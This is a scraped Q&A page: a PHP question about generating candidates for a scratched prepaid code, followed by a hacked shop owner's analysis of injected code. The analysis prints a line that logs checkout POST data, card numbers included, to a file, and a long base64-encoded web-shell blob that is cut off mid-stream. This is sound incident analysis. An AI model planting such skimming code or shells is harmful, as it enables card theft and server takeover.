PHP code to replace certain values in array, code generator - php

I am trying to write PHP code as a hobby project to basically create a "possible" code generator. The scenario is that we have a list of 25 valid characters that can be used.
Imagine that you have a 25 character code but you have accidentally scratched off the first two characters or three characters at any location in the code. Now we need to find all the possible combinations to try out. I have put all the valid characters into the array below that can be used in the code.
$valid=array("B","C","D","F","G","H","J","K","M","P","Q","R","T","V","W","X","Y","Z",
"2","3","4","6","7","8","9");
$arraylength=count($valid);
The still available or seen characters are input into a text box and in the place where the character is unreadable is left blank and the variable values are fetched.
$char1= $_POST['code1'];
$char2= $_POST['code2'];
$char3= $_POST['code3'];
$char4= $_POST['code4'];
$char5= $_POST['code5'];
$char6= $_POST['code6'];
$char7= $_POST['code7'];
$char8= $_POST['code8'];
$char9= $_POST['code9'];
$char10= $_POST['code10'];
$char11= $_POST['code11'];
$char12= $_POST['code12'];
$char13= $_POST['code13'];
$char14= $_POST['code14'];
$char15= $_POST['code15'];
$char16= $_POST['code16'];
$char17= $_POST['code17'];
$char18= $_POST['code18'];
$char19= $_POST['code19'];
$char20= $_POST['code20'];
$char21= $_POST['code21'];
$char22= $_POST['code22'];
$char23= $_POST['code23'];
$char24= $_POST['code24'];
$char25= $_POST['code25'];
And put into an array...
$jada = array($char1, $char2, $char3, $char4, $char5, $char6, $char7, $char8, $char9, $char10, $char11, $char12, $char13, $char14, $char15
, $char16, $char17, $char18, $char19, $char20, $char21, $char22, $char23, $char24, $char25);
I have been stumped for a while now, the fiddling I have done at the moment is that if a variable is empty then do something (as a test echo or print the possible combinations)
if(!isset($char1) || trim($char1) == ""){
for($x=0;$x<$arraylength;$x++) {
echo $valid[$x];
echo "<br>";
} }
else{
echo ($char1);
}
Can you guys help out?


Saw this still in an open status after many years of hiatus, I figured that I may as well share some information.
In the end I figured it out, you can grab the source here and test it in your own server: https://github.com/Masterkriz/XBOX_Pre-paid_code_fixer

Related

Deobfuscating Malicious Code: What's the purpose of this code?

So this week our small business ecommerce site got hacked. We noticed that the files on the live server were out of sync with our svn repo. Two files having to do with verifying card numbers had this at the end:
#file_put_contents("/home/*****/public_html/errors/error_log.txt", "{$_SERVER["REMOTE_ADDR"]}, {$_SERVER["REQUEST_URI"]}:\n" . print_r($_POST, 1), FILE_APPEND);
It writes the current request to an error_log.txt file. This code runs when the user hits 'confirm purchase', so the request has the full payment info in it. Obviously, this is not good.
We reverted the files and started investigating. The file this line was in was a *.inc file, and not publicly visible. The attacker must have already had access to our file system to read our code, know that that particular file was called during checkout, and insert the line in the correct place.
Today I found another file tucked away in a rarely touched corner of the site. log.php seems to present an interface for remote code execution. It was heavily obfuscated. Here is my attempt at deobfuscating it. Scroll past the massive block of base64 encoded mystery code to see my comments.
<?php
$data=base64_decode(str_replace("\n", '', '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
